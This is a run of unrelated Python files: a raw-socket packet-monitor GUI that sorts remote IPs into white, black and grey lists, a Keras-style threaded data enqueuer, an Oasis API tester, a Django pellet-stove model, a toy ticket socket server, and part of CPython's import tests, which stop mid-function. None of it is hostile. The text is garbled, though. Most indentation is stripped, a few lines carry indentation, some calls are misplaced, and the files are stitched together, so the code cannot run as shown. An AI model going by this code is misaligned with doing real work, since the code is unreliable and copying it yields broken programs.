s2.config(command=t2.yview)
border_misc.grid(row=0,column=2,columnspan=2, sticky=W)
border_buttons = Frame(main_win)
border_buttons.grid(row=4,column=0,columnspan=1)
border_buttons1 = Frame(main_win)
border_buttons1.grid(row=4,column=1,columnspan=1)
border_buttons2 = Frame(main_win)
border_buttons2.grid(row=4,column=2,columnspan=2)
inpCount = StringVar()
countinPackets=Label(border_buttons2,borderwidth=2,height=1,width=60, textvariable=inpCount)
countinPackets.pack(fill=BOTH, expand=YES, side="top")
outpCount = StringVar()
countoutPackets=Label(border_buttons2,borderwidth=2,height=1,width=60, textvariable=outpCount)
countoutPackets.pack(fill=BOTH, expand=YES, side="top")
image1=Image.open(os.path.join(subdirectory1,"quit.png"))
image1=image1.resize((90,32), Image.BICUBIC)
photo1=ImageTk.PhotoImage(image1)
quitButton=Button(border_buttons,image=photo1,width=70,height=30,command=lambda:exitClick(main_win))
quitButton.image=photo1
quitButton.pack(side="left",ipadx=20,pady=7)
image=Image.open(os.path.join(subdirectory1,"IP Table.png"))
image=image.resize((90,32), Image.BICUBIC)
photo=ImageTk.PhotoImage(image)
viewip = Button(border_buttons, width=70,height=32,image=photo,command=ipTables)
viewip.image=photo
viewip.pack(side="left",ipadx=10,pady=7)
image2 = Image.open(os.path.join(subdirectory1,"Parse.png"))
image2 = image2.resize((90,32), Image.BICUBIC)
photo2 = ImageTk.PhotoImage(image2)
parseButton = Button(border_buttons, image=photo2, width=70, height=32,command=parseClick)
parseButton.image=photo2
parseButton.pack(side="left",ipadx=10,pady=7)
def eth_addr(a):
b = "%.2x:%.2x:%.2x:%.2x:%.2x:%.2x" % (ord(a[0]), ord(a[1]), ord(a[2]), ord(a[3]), ord(a[4]), ord(a[5]))
return b
class IPSniff:
def __init__(self, interface_name, on_ip_incoming, on_ip_outgoing):
self.interface_name = interface_name
self.on_ip_incoming = on_ip_incoming
self.on_ip_outgoing = on_ip_outgoing
# The raw in (listen) socket is a L2 raw socket that listens
# for all packets going through a specific interface.
self.ins = socket.socket(
socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))
self.ins.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 2 ** 30)
self.ins.bind((self.interface_name, ETH_P_ALL))
mainUI()
parseUI()
def __process_ipframe(self, pkt_type, ip_header, payload):
# Extract the 20 bytes IP header, ignoring the IP options
fields = struct.unpack("!BBHHHBBHII", ip_header)
dummy_hdrlen = fields[0] & 0xf
iplen = fields[2]
ip_src = payload[12:16]
ip_dst = payload[16:20]
ip_frame = payload[0:iplen]
if pkt_type == socket.PACKET_OUTGOING:
if self.on_ip_outgoing is not None:
self.on_ip_outgoing(ip_src, ip_dst, ip_frame)
else:
if self.on_ip_incoming is not None:
self.on_ip_incoming(ip_src, ip_dst, ip_frame)
def recv(self):
while True:
if (pSniff==0):
pkt, sa_ll = self.ins.recvfrom(MTU)
# Skip packets for which no callback was registered; sa_ll[2] carries the packet type.
if sa_ll[2] == socket.PACKET_OUTGOING and self.on_ip_outgoing is None:
    continue
elif sa_ll[2] != socket.PACKET_OUTGOING and self.on_ip_incoming is None:
    continue
if len(pkt) <= 0:
break
eth_header = struct.unpack("!6s6sH", pkt[0:14])
dummy_eth_protocol = socket.ntohs(eth_header[2])
if eth_header[2] != 0x800:
continue
ip_header = pkt[14:34]
payload = pkt[14:]
self.__process_ipframe(sa_ll[2], ip_header, payload)
time.sleep(0.1)
class sniffThread(Thread):
def __init__(self,iface):
self.interface=iface
super(sniffThread, self).__init__()
self.stoprequest = Event()
def run(self):
while not self.stoprequest.isSet():
try:
ip_sniff.interface=self.interface
ip_sniff.recv()
except Queue.Empty:
continue
def chInterface(self):
    global interface, pSniff
    # Pause the current capture, then re-run the interface picker;
    # selectInterface() rebuilds ip_sniff, starts a fresh sniff thread
    # and resets pSniff to 0.
    pSniff = 1
    selectInterface()
    self.interface = interface
    ip_sniff.interface = interface
def stahp(self, timeout=None):
global pSniff
pSniff = 1
class parseThread(Thread):
def __init__(self, tip):
self.testip = tip
super(parseThread, self).__init__()
self.stoprequest = Event()
def run(self):
try:
callParse(self.testip)
except Exception:
sys.exit()
def stahp(self, timeout=None):
global pParse
pParse = 1
# Example code to use IPSniff
def test_incoming_callback(src, dst, border_in):
global inc_txt_str, inc_packet, inc_packet_size
#print("Incoming: Source=%s, Dest=%s, Len = %d \nFrame data: %s\n\n" %(socket.inet_ntoa(src), socket.inet_ntoa(dst), len(border_in), border_in))
main_win.deiconify()
t.configure(state=NORMAL)
inc_txt_str += "Incoming from "
inc_txt_str += str(socket.inet_ntoa(src))
#inc_txt_str += ", Dest="
#inc_txt_str += str(socket.inet_ntoa(dst))
inc_txt_str += ", Len = "
inc_txt_str += str(len(border_in))
inc_txt_str += "\n"
inc_packet = inc_packet + 1
inc_packet_size = inc_packet_size + len(border_in)
inc_packet_string = "Incoming packets: " + str(inc_packet) + " Total downloaded: " + str(float("{0:.2f}".format(inc_packet_size/1024))) + "kB"
inpCount.set(str(inc_packet_string))
#inc_txt_str += str(border_in)
main_win.update_idletasks()
#print inc_txt_str
t.insert(END, inc_txt_str)
t.see(END)
t.update_idletasks()
testip = socket.inet_ntoa(src)
writeToParse(testip)
t.configure(state=DISABLED)
def writeToParse(testip):
global thrParse
#thrParse = Thread(target=callParse, args=(testip,))
thrParse = parseThread(testip)
thrParse.start()
def callParse(tstip):
ip_local = get_ip_address(interface)
loctet = ip_local.rfind('.')
subnet = ip_local[0:loctet]
cloctet = tstip.rfind('.')
csubnet = tstip[0:cloctet]
with open(os.path.join(subdirectory, "parseip.db"), 'a') as text_file:
t2.configure(state=NORMAL)
if not str(csubnet) == str(subnet):
#text_file.write(str(tstip))
#text_file.write("\n")
t2.insert(END, tstip)
t2.insert(END, ": ")
try:
sitename=socket.gethostbyaddr(str(tstip))
sitename=sitename[0]
sitename=str(sitename)
if any (x in sitename for x in wl):
with open(os.path.join(subdirectory, "whitelist.db"), 'r') as wl_IPs:
try:
ipList=wl_IPs.read()
ipList.index(str(tstip)) > -1
except:
with open(os.path.join(subdirectory, "whitelist.db"), 'a') as wlList:
wlList.write(str(tstip))
wlList.write("\n")
addtoWL = str(tstip) + "\t" + sitename + "\n"
whiteltext.configure(state=NORMAL)
whiteltext.insert(END, addtoWL)
whiteltext.see(END)
whiteltext.update_idletasks()
whiteltext.configure(state=DISABLED)
elif any (x in sitename for x in bl):
with open(os.path.join(subdirectory, "blacklist.db"), 'r') as bl_IPs:
try:
ipList=bl_IPs.read()
ipList.index(str(tstip)) > -1
except:
with open(os.path.join(subdirectory, "blacklist.db"), 'a') as blList:
blList.write(str(tstip))
blList.write("\n")
addtoBL = str(tstip) + "\t" + sitename + "\n"
blackltext.configure(state=NORMAL)
blackltext.insert(END, addtoBL)
blackltext.see(END)
blackltext.update_idletasks()
blackltext.configure(state=DISABLED)
else:
with open(os.path.join(subdirectory, "greylist.db"), 'r') as gl_IPs:
try:
ipList=gl_IPs.read()
ipList.index(str(tstip)) > -1
except:
with open(os.path.join(subdirectory, "greylist.db"), 'a') as glList:
glList.write(str(tstip))
glList.write("\n")
addtoGL = str(tstip) + "\t" + sitename + "\n"
greyltext.configure(state=NORMAL)
greyltext.insert(END, addtoGL)
greyltext.see(END)
greyltext.update_idletasks()
greyltext.configure(state=DISABLED)
except socket.herror:
with open(os.path.join(subdirectory, "parseip.db"), 'r') as check_file:
ipList=check_file.read()
ipList=str(ipList)
try:
ipList.index(str(tstip)) > -1
sitename="Unknown, already added to parsing list"
except:
sitename="Unknown, added to parsing list"
text_file.write(str(tstip))
text_file.write("\n")
tpi.configure(state=NORMAL)
tpi.insert(END, str(tstip))
tpi.insert(END, "\t\t")
tpi.see(END)
tpi.update_idletasks()
tpi.configure(state=DISABLED)
t2.configure(state=NORMAL)
t2.insert(END, sitename)
t2.insert(END, "\n")
t2.see(END)
t2.update_idletasks()
t2.configure(state=DISABLED)
def test_outgoing_callback(src, dst, border_in):
global out_txt_str, out_packet, out_packet_size
t1.configure(state=NORMAL)
main_win.deiconify()
#print("Outgoing: Source=%s, Dest=%s, Len = %d \nFrame data: %s\n\n" %(socket.inet_ntoa(src), socket.inet_ntoa(dst), len(border_in), border_in))
out_txt_str += "Outgoing to "
#out_txt_str += str(socket.inet_ntoa(src))
#out_txt_str += ", Dest="
out_txt_str += str(socket.inet_ntoa(dst))
out_txt_str += ", Len = "
out_txt_str += str(len(border_in))
out_txt_str += "\n"
out_packet = out_packet + 1
out_packet_size = out_packet_size + len(border_in)
out_packet_string = "Outgoing packets: " + str(out_packet) + " Total uploaded: " + str(float("{0:.2f}".format(out_packet_size/1024))) + "kB"
outpCount.set(str(out_packet_string))
#inc_txt_str += str(border_in)
#frame_out.update_idletasks()
#print inc_txt_str
t1.insert(END, out_txt_str)
t1.see(END)
t1.update_idletasks()
testip = socket.inet_ntoa(dst)
writeToParse(testip)
t1.configure(state=DISABLED)
def format_ip(addr):
return str(ord(addr[0])) + '.' + \
str(ord(addr[1])) + '.' + \
str(ord(addr[2])) + '.' + \
str(ord(addr[3]))
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return socket.inet_ntoa(fcntl.ioctl(
s.fileno(),
0x8915, # SIOCGIFADDR
struct.pack('256s', ifname[:15])
)[20:24])
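# Illustrative only: get_ip_address returns the IPv4 address bound to a given
# interface via the SIOCGIFADDR ioctl; the interface name below is an assumption.
#
#   get_ip_address('eth0')   # e.g. '192.168.1.10'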
def selectInterface():
global interface, ip_sniff, thrSniff, pSniff
ifs = netifaces.interfaces()
chmsg = "Enter Interface you want to sniff on:\n"
chtitle = "Interface selection"
chchoices = ["", "", "", "", "", "", ""]
chcount = 0
for i in ifs:
# print "%12s %s" % (i[0], format_ip(i[1]))
chmsg += str(i)
chchoices[chcount] = str(i)
# Listbox.insert(listbox, str(i[0]))
chcount += 1
chmsg += " "
addrs = netifaces.ifaddresses(str(i))
try:
ipaddrs = addrs[netifaces.AF_INET]
#chmsg += str(format_ip(ipaddrs))
chmsg += " "
chmsg += str(ipaddrs[0]['addr'])
chmsg += "\n"
except:
chmsg += " "
chmsg += "Interface Not Up\n"
interface = easygui.choicebox(chmsg, chtitle, chchoices)
ip_sniff = IPSniff(interface, test_incoming_callback, test_outgoing_callback)
#thrSniff = Thread(target=ip_sniff.recv, args=())
thrSniff = sniffThread(interface)
thrSniff.start()
pSniff = 0
selectInterface()
mainloop()
data_util.py
'''
This file is modified from the Keras implementation of multi-threaded data processing;
see https://github.com/fchollet/keras/blob/master/keras/utils/data_utils.py
'''
import time
import numpy as np
import threading
import multiprocessing
try:
import queue
except ImportError:
import Queue as queue
class GeneratorEnqueuer():
"""Builds a queue out of a data generator.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which endlessly yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers,
    will be incremented by one for each worker.
"""
def __init__(self, generator,
use_multiprocessing=False,
wait_time=0.05,
random_seed=None):
self.wait_time = wait_time
self._generator = generator
self._use_multiprocessing = use_multiprocessing
self._threads = []
self._stop_event = None
self.queue = None
self.random_seed = random_seed
def start(self, workers=1, max_queue_size=10):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`)
"""
def data_generator_task():
while not self._stop_event.is_set():
try:
if self._use_multiprocessing or self.queue.qsize() < max_queue_size:
generator_output = next(self._generator)
self.queue.put(generator_output)
else:
time.sleep(self.wait_time)
except Exception:
self._stop_event.set()
raise
try:
if self._use_multiprocessing:
self.queue = multiprocessing.Queue(maxsize=max_queue_size)
self._stop_event = multiprocessing.Event()
else:
self.queue = queue.Queue()
self._stop_event = threading.Event()
for _ in range(workers):
if self._use_multiprocessing:
# Reset random seed else all children processes
# share the same seed
np.random.seed(self.random_seed)
thread = multiprocessing.Process(target=data_generator_task)
thread.daemon = True
if self.random_seed is not None:
self.random_seed += 1
else:
thread = threading.Thread(target=data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`.
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if thread.is_alive():
if self._use_multiprocessing:
thread.terminate()
else:
thread.join(timeout)
if self._use_multiprocessing:
if self.queue is not None:
self.queue.close()
self._threads = []
self._stop_event = None
self.queue = None
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
A generator
"""
while self.is_running():
if not self.queue.empty():
inputs = self.queue.get()
if inputs is not None:
yield inputs
else:
time.sleep(self.wait_time)
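# Illustrative only (not part of the original module): a typical driver loop for
# GeneratorEnqueuer. The batch generator and consumer names are placeholders.
#
#   enqueuer = GeneratorEnqueuer(my_batch_generator(), use_multiprocessing=True)
#   enqueuer.start(workers=4, max_queue_size=16)
#   try:
#       for batch in enqueuer.get():
#           train_step(batch)   # hypothetical consumer
#   finally:
#       enqueuer.stop()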
api_tester_old.py
from __future__ import print_function
# Python 2 standard library imports
import argparse
import json
import logging
import os
import shutil
import sys
import threading
import uuid
# Oasis Api import
from oasislmf.api_client.client import OasisAPIClient
'''
Test utility for running a model analysis using the Oasis API.
'''
parser = argparse.ArgumentParser(description='Test the Oasis API client.')
parser.add_argument(
'-i', '--api_ip', metavar='N', type=str, required=True,
help='The oasis API IP address.')
parser.add_argument(
'-a', '--analysis_settings_json', type=str, required=True,
help="The analysis settings JSON file.")
parser.add_argument(
'-d', '--input_data_directory', type=str, required=True,
help="The input data directory.")
parser.add_argument(
'-o', '--output_data_directory', type=str, required=True,
help="The output data directory.")
parser.add_argument(
'-n', '--num_analyses', metavar='N', type=int, default=1,
help='The number of analyses to run.')
parser.add_argument(
'-v', '--verbose', action='store_true',
help='Verbose logging.')
args = parser.parse_args()
api_ip = args.api_ip
analysis_settings_json_filepath = args.analysis_settings_json
num_analyses = args.num_analyses
input_data_directory = args.input_data_directory
output_data_directory = args.output_data_directory
do_verbose = args.verbose
api_url = 'http://{}'.format(api_ip)
if not os.path.exists(input_data_directory):
print("Input data directory does not exist: {}".format(analysis_settings_json_filepath))
exit()
if not os.path.exists(analysis_settings_json_filepath):
print("Analysis settings file does not exist: {}".format(analysis_settings_json_filepath))
exit()
if not os.path.exists(output_data_directory):
os.makedirs(output_data_directory)
num_failed = 0
num_completed = 0
if do_verbose:
log_level = logging.DEBUG
log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
else:
log_level = logging.INFO
log_format = ' %(message)s'
logging.basicConfig(stream=sys.stdout, level=log_level, format=log_format)
# Parse the analysis settings file
with open(analysis_settings_json_filepath) as file:
analysis_settings = json.load(file)
do_il = bool(analysis_settings['analysis_settings']["il_output"])
class Counter:
    def __init__(self):
        self.num_failed = 0
        self.num_completed = 0
        self._lock = threading.Lock()
    def increment_num_completed(self):
        # Guard the read-modify-write so concurrent analysis threads cannot lose updates.
        with self._lock:
            self.num_completed = self.num_completed + 1
    def increment_num_failed(self):
        with self._lock:
            self.num_failed = self.num_failed + 1
def run_analysis(c):
try:
upload_directory = os.path.join("upload", str(uuid.uuid1()))
shutil.copytree(
os.path.join(input_data_directory, "csv"),
upload_directory)
client = OasisAPIClient(api_url, logging.getLogger())
input_location = client.upload_inputs_from_directory(
upload_directory, do_il, do_validation=False)
client.run_analysis(
analysis_settings, input_location,
output_data_directory, do_clean=False)
c.increment_num_completed()
except Exception:
logging.exception("API test failed")
c.increment_num_failed()
analysis_threads = list()
c = Counter()
for analysis_id in range(num_analyses):
analysis_threads.append(
threading.Thread(target=run_analysis, args=[c])
)
for t in analysis_threads:
t.start()
for t in analysis_threads:
t.join()
print("Done. Num completed={}; Num failed={}".format(c.num_completed, c.num_failed))
models.py
from django.db import models
import multiprocessing
from .send_command import ProcessSendCommand
from django.conf import settings
class PelletStoveCmd():
def __init__(self):
self.send_commands = False
self.fan1_speed = 5
self.fan2_speed = 5
self.flame_power = 3
self.mode = True
self.QueueCmd = multiprocessing.Queue()
self.p1 = multiprocessing.Process(target=ProcessSendCommand, args=(self.QueueCmd, settings.DATA_ENV['REMOTE_ID']))
self.p1.start()
def SendCommand(self):
self.QueueCmd.put(self.ConvertRequestToDict(), block=False)
def ConvertRequestToDict(self):
d = {"send_commands": self.send_commands,
"fan1_speed": self.fan1_speed,
"fan2_speed": self.fan2_speed,
"flame_power": self.flame_power,
"mode": self.mode}
return d
def __str__(self) -> str:
s = 'send_commands = {0}\n'.format(self.send_commands)
s += 'fan1_speed = {0}\n'.format(self.fan1_speed)
s += 'fan2_speed = {0}\n'.format(self.fan2_speed)
s += 'flame_power = {0}\n'.format(self.flame_power)
s += 'mode = {0}\n'.format(self.mode)
return s
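# Illustrative only (not part of the original module): a minimal sketch of how
# this command object would be driven; it assumes settings.DATA_ENV['REMOTE_ID']
# is configured so the sender process can start.
#
#   stove = PelletStoveCmd()
#   stove.send_commands = True
#   stove.flame_power = 4
#   stove.SendCommand()   # enqueues ConvertRequestToDict() for ProcessSendCommand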
server.py
import socket
import threading
import time
def logicka(request):
    print("request", request)
    superUser = 0
    concerts = []
    places = []
    if request in ('1', '0'):
        if request == '1':
            superUser = 1
        concerts = ["Imagine Dragons", "Tarkov", "KINO", "Kazah-Han", "Coiner"]
        if superUser == 1:
            # Discounted prices for the privileged user ('1').
            places = ["Rows 1-5: 500 rubles", "Rows 6-9: 400 rubles", "Rows 10-15: 200 rubles", "Stalls: 700 rubles"]
        else:
            places = ["Rows 1-5: 1000 rubles", "Rows 6-9: 800 rubles", "Rows 10-15: 600 rubles", "Stalls: 1500 rubles"]
        return bytes(str([concerts, places]), 'utf8')
    else:
        # Any other request is treated as a purchase string of the form "concert/seats".
        buy = request.split('/')
        print("\n", "buy_____:", buy)
        return bytes(str(buy), 'utf8')
def process_request(conn, addr):
    print('connected:', addr)
    conn.settimeout(120)
    while True:
        try:
            data = conn.recv(1024)
            if not data:
                # Client closed the connection.
                break
            request = data.decode('utf-8')
            response = logicka(request)
            # print(f'Received request: {ascii(request)}')
            # print(f'Sent response: {ascii(response.decode("utf-8"))}')
            conn.send(response)
        except socket.timeout:
            print("close connection by timeout")
            break
    conn.close()
sock = socket.socket()
sock.bind(('', 9090))
sock.listen(1)
while True:
conn, addr = sock.accept()
th = threading.Thread(target=process_request, args=(conn, addr))
th.start()
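# Illustrative client sketch (not part of the original script). The host, port
# and the '1'/'0' request convention follow the server code above; everything
# else is an assumption, so the example is left commented out:
#
#   import socket
#   client = socket.socket()
#   client.connect(('localhost', 9090))
#   client.send(b'1')                      # '1' = privileged price list, '0' = regular
#   print(client.recv(4096).decode('utf-8'))
#   client.close()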
__init__.py
# We import importlib *ASAP* in order to test #15386
import importlib
import importlib.util
from importlib._bootstrap_external import _get_sourcefile
import builtins
import marshal
import os
import platform
import py_compile
import random
import shutil
import subprocess
import stat
import sys
import threading
import time
import unittest
import unittest.mock as mock
import textwrap
import errno
import contextlib
import glob
import test.support
from test.support import (
EnvironmentVarGuard, TESTFN, check_warnings, forget, is_jython,
make_legacy_pyc, rmtree, run_unittest, swap_attr, swap_item, temp_umask,
unlink, unload, create_empty_file, cpython_only, TESTFN_UNENCODABLE,
temp_dir, DirsOnSysPath)
from test.support import script_helper
from test.test_importlib.util import uncache
skip_if_dont_write_bytecode = unittest.skipIf(
sys.dont_write_bytecode,
"test meaningful only when writing bytecode")
def remove_files(name):
for f in (name + ".py",
name + ".pyc",
name + ".pyw",
name + "$py.class"):
unlink(f)
rmtree('__pycache__')
@contextlib.contextmanager
def _ready_to_import(name=None, source=""):
# sets up a temporary directory and removes it
# creates the module file
# temporarily clears the module from sys.modules (if any)
# reverts or removes the module when cleaning up
name = name or "spam"
with temp_dir() as tempdir:
path = script_helper.make_script(tempdir, name, source)
old_module = sys.modules.pop(name, None)
try:
sys.path.insert(0, tempdir)
yield name, path
sys.path.remove(tempdir)
finally:
if old_module is not None:
sys.modules[name] = old_module
elif name in sys.modules:
del sys.modules[name]
class ImportTests(unittest.TestCase):
def setUp(self):
remove_files(TESTFN)
importlib.invalidate_caches()
def tearDown(self):
unload(TESTFN)
def test_import_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
import something_that_should_not_exist_anywhere
def test_from_import_missing_module_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
from something_that_should_not_exist_anywhere import blah
def test_from_import_missing_attr_raises_ImportError(self):
with self.assertRaises(ImportError):
from importlib import something_that_should_not_exist_anywhere
def test_from_import_missing_attr_has_name_and_path(self):
with self.assertRaises(ImportError) as cm:
from os import i_dont_exist
self.assertEqual(cm.exception.name, 'os')
self.assertEqual(cm.exception.path, os.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from 'os' \(.*os.py\)")
@cpython_only
def test_from_import_missing_attr_has_name_and_so_path(self):
import _testcapi
with self.assertRaises(ImportError) as cm:
from _testcapi import i_dont_exist
self.assertEqual(cm.exception.name, '_testcapi')
self.assertEqual(cm.exception.path, _testcapi.__file__)
self.assertRegex(str(cm.exception), r"cannot import name 'i_dont_exist' from '_testcapi' \(.*\.(so|pyd)\)")
def test_from_import_missing_attr_has_name(self):
with self.assertRaises(ImportError) as cm:
# _warning has no path as it's a built-in module.
from _warning import i_dont_exist
self.assertEqual(cm.exception.name, '_warning')
self.assertIsNone(cm.exception.path)
def test_from_import_missing_attr_path_is_canonical(self):
with self.assertRaises(ImportError) as cm:
from os.path import i_dont_exist
self.assertIn(cm.exception.name, {'posixpath', 'ntpath'})
self.assertIsNotNone(cm.exception)
def test_from_import_star_invalid_type(self):
import re
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("__all__ = [b'invalid_type']")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__all__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
with _ready_to_import() as (name, path):
with open(path, 'w') as f:
f.write("globals()[b'invalid_type'] = object()")
globals = {}
with self.assertRaisesRegex(
TypeError, f"{re.escape(name)}\\.__dict__ must be str"
):
exec(f"from {name} import *", globals)
self.assertNotIn(b"invalid_type", globals)
def test_case_sensitivity(self):
# Brief digression to test that import is case-sensitive: if we got
# this far, we know for sure that "random" exists.
with self.assertRaises(ImportError):
import RAnDoM
def test_double_const(self):
# Another brief digression to test the accuracy of manifest float
# constants.
from test import double_const # don't blink -- that *was* the test
def test_import(self):
def test_with_extension(ext):
# The extension is normally ".py", perhaps ".pyw".
source = TESTFN + ext
if is_jython:
pyc = TESTFN + "$py.class"
else:
pyc = TESTFN + ".pyc"
with open(source, "w") as f:
print("# This tests Python's ability to import a",
ext, "file.", file=f)
a = random.randrange(1000)
b = random.randrange(1000)
print("a =", a, file=f)
print("b =", b, file=f)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
importlib.invalidate_caches()
try:
try:
mod = __import__(TESTFN)
except ImportError as err:
self.fail("import from %s failed: %s" % (ext, err))
self.assertEqual(mod.a, a,
"module loaded (%s) but contents invalid" % mod)
self.assertEqual(mod.b, b,
"module loaded (%s) but contents invalid" % mod)
finally:
forget(TESTFN)
unlink(source)
unlink(pyc)
sys.path.insert(0, os.curdir)
try:
test_with_extension(".py")
if sys.platform.startswith("win"):
for ext in [".PY", ".Py", ".pY", ".pyw", ".PYW", ".pYw"]:
test_with_extension(ext)
finally:
del sys.path[0]
def test_module_with_large_stack(self, module='longlist'):
# Regression test for http://bugs.python.org/issue561858.
filename = module + '.py'
# Create a file with a list of 65000 elements.
with open(filename, 'w') as f:
f.write('d = [\n')
for i in range(65000):
f.write('"",\n')
f.write(']')
try:
# Compile & remove .py file; we only need .pyc.
# Bytecode must be relocated from the PEP 3147 bytecode-only location.
py_compile.compile(filename)
finally:
unlink(filename)
# Need to be able to load from current dir.
sys.path.append('')
importlib.invalidate_caches()
namespace = {}
try:
make_legacy_pyc(filename)
# This used to crash.
exec('import ' + module, None, namespace)
finally:
# Cleanup.
del sys.path[-1]
unlink(filename + 'c')
unlink(filename + 'o')
# Remove references to the module (unload the module)
namespace.clear()
try:
del sys.modules[module]
except KeyError:
pass
def test_failing_import_sticks(self):
source = TESTFN + ".py"
with open(source, "w") as f:
print("a = 1/0", file=f)
# New in 2.4, we shouldn't be able to import that no matter how often
# we try.
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
if TESTFN in sys.modules:
del sys.modules[TESTFN]
try:
for i in [1, 2, 3]:
self.assertRaises(ZeroDivisionError, __import__, TESTFN)
self.assertNotIn(TESTFN, sys.modules,
"damaged module in sys.modules on %i try" % i)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_import_name_binding(self):
# import x.y.z binds x in the current namespace
import test as x
import test.support
self.assertIs(x, test, x.__name__)
self.assertTrue(hasattr(test.support, "__file__"))
# import x.y.z as w binds z as w
import test.support as y
self.assertIs(y, test.support, y.__name__)
def test_issue31286(self):
# import in a 'finally' block resulted in SystemError
try:
x = ...
finally:
import test.support.script_helper as x
# import in a 'while' loop resulted in stack overflow
i = 0
while i < 10:
import test.support.script_helper as x
i += 1
# import in a 'for' loop resulted in segmentation fault
for i in range(2):
import test.support.script_helper as x
def test_failing_reload(self):
# A failing reload should leave the module object in sys.modules.
source = TESTFN + os.extsep + "py"
with open(source, "w") as f:
f.write("a = 1\nb=2\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertIn(TESTFN, sys.modules)
self.assertEqual(mod.a, 1, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
# On WinXP, just replacing the .py file wasn't enough to
# convince reload() to reparse it. Maybe the timestamp didn't
# move enough. We force it to get reparsed by removing the
# compiled file too.
remove_files(TESTFN)
# Now damage the module.
with open(source, "w") as f:
f.write("a = 10\nb=20//0\n")
self.assertRaises(ZeroDivisionError, importlib.reload, mod)
# But we still expect the module to be in sys.modules.
mod = sys.modules.get(TESTFN)
self.assertIsNotNone(mod, "expected module to be in sys.modules")
# We should have replaced a w/ 10, but the old b value should
# stick.
self.assertEqual(mod.a, 10, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
finally:
del sys.path[0]
remove_files(TESTFN)
unload(TESTFN)
@skip_if_dont_write_bytecode
def test_file_to_source(self):
# check if __file__ points to the source file where available
source = TESTFN + ".py"
with open(source, "w") as f:
f.write("test = None\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertTrue(mod.__file__.endswith('.py'))
os.remove(source)
del sys.modules[TESTFN]
make_legacy_pyc(source)
importlib.invalidate_caches()
mod = __import__(TESTFN)
base, ext = os.path.splitext(mod.__file__)
self.assertEqual(ext, '.pyc')
finally:
del sys.path[0]
remove_files(TESTFN)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
def test_import_by_filename(self):
path = os.path.abspath(TESTFN)
encoding = sys.getfilesystemencoding()
try:
path.encode(encoding)
except UnicodeEncodeError:
self.skipTest('path is not encodable to {}'.format(encoding))
with self.assertRaises(ImportError) as c:
__import__(path)
def test_import_in_del_does_not_crash(self):
# Issue 4236
testfn = script_helper.make_script('', TESTFN, textwrap.dedent("""\
import sys
class C:
def __del__(self):
import importlib
sys.argv.insert(0, C())
"""))
script_helper.assert_python_ok(testfn)
@skip_if_dont_write_bytecode
def test_timestamp_overflow(self):
# A modification timestamp larger than 2**32 should not be a problem
# when importing a module (issue #11235).
sys.path.insert(0, os.curdir)
try:
source = TESTFN + ".py"
compiled = importlib.util.cache_from_source(source)
with open(source, 'w') as f:
pass
try:
os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
except OverflowError:
self.skipTest("cannot set modification time to large integer")
except OSError as e:
if e.errno not in (getattr(errno, 'EOVERFLOW', None),
getattr(errno, 'EINVAL', None)):
raise
self.skipTest("cannot set modification time to large integer ({})".format(e))
__import__(TESTFN)
# The pyc file was created.
os.stat(compiled)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_bogus_fromlist(self):
try:
__import__('http', fromlist=['blah'])
except ImportError:
self.fail("fromlist must allow bogus names")
@cpython_only
def test_delete_builtins_import(self):
args = ["-c", "del __builtins__.__import__; import os"]
popen = script_helper.spawn_python(*args)
stdout, stderr = popen.communicate()
self.assertIn(b"ImportError", stdout)
def test_from_import_message_for_nonexistent_module(self):
with self.assertRaisesRegex(ImportError, "^No module named 'bogus'"):
from bogus import foo
def test_from_import_message_for_existing_module(self):
with self.assertRaisesRegex(ImportError, "^cannot import name 'bogus'"):
from re import bogus
def test_from_import_AttributeError(self):
# Issue #24492: trying to import an attribute that raises an
# AttributeError should lead to an ImportError.
class AlwaysAttributeError:
def __getattr__(self, _):
raise AttributeError
module_name = 'test_from_import_AttributeError'
self.addCleanup(unload, module_name)
sys.modules[module_name] = AlwaysAttributeError()
with self.assertRaises(ImportError) as cm:
from test_from_import_AttributeError import does_not_exist
self.assertEqual(str(cm.exception),
"cannot import name 'does_not_exist' from '<unknown module name>' (unknown location)")
@cpython_only
def test_issue31492(self):
# There shouldn't be an assertion failure in case of failing to import
# from a module with a bad __name__ attribute, or in case of failing
# to access an attribute of such a module.
with swap_attr(os, '__name__', None):
with self.assertRaises(ImportError):
from os import does_not_exist
with self.assertRaises(AttributeError):
os.does_not_exist
def test_concurrency(self):
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'data'))
try:
exc = None
def run():
event.wait()
try:
import package
except BaseException as e:
nonlocal exc
exc = e
for i in range(10):
event = threading.Event()
threads = [threading.Thread(target=run) for x in range(2)]
try:
